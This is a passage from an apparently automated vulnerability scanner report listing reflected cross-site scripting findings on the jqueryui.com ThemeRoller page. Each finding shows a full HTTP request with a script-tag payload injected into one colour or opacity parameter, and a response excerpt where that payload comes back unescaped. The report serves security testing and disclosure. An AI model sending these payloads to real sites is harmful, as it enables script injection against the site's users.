GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff8d819"><script>alert(1)</script>83856e3d441&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff8d819"><script>alert(1)</script>83856e3d441&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

1.115. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e72"><script>alert(1)</script>a9d4d2e762b was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffd6e72"><script>alert(1)</script>a9d4d2e762b&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffd6e72"><script>alert(1)</script>a9d4d2e762b&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

1.116. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc373"><script>alert(1)</script>3ea55f7fc70 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fc373"><script>alert(1)</script>3ea55f7fc70&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fc373"><script>alert(1)</script>3ea55f7fc70&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

1.117. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc30"><script>alert(1)</script>a9e1b8c37b8 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecdfc30"><script>alert(1)</script>a9e1b8c37b8&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecdfc30"><script>alert(1)</script>a9e1b8c37b8&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

1.118. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e6a"><script>alert(1)</script>8bf4ad7e592 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd1e6a"><script>alert(1)</script>8bf4ad7e592&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd1e6a"><script>alert(1)</script>8bf4ad7e592&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

1.119. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d5e"><script>alert(1)</script>f1386d08681 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee75d5e"><script>alert(1)</script>f1386d08681&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee75d5e"><script>alert(1)</script>f1386d08681&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

1.120. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee34f"><script>alert(1)</script>617f19d2f28 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadaee34f"><script>alert(1)</script>617f19d2f28&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadaee34f"><script>alert(1)</script>617f19d2f28&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

1.121. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf45"><script>alert(1)</script>00cbd4e3568 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa6bf45"><script>alert(1)</script>00cbd4e3568&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa6bf45"><script>alert(1)</script>00cbd4e3568&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

1.122. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2569"><script>alert(1)</script>93fcf126caf was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaac2569"><script>alert(1)</script>93fcf126caf&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaac2569"><script>alert(1)</script>93fcf126caf&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.123. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8152"><script>alert(1)</script>eb15dc8b101 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65a8152"><script>alert(1)</script>eb15dc8b101&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&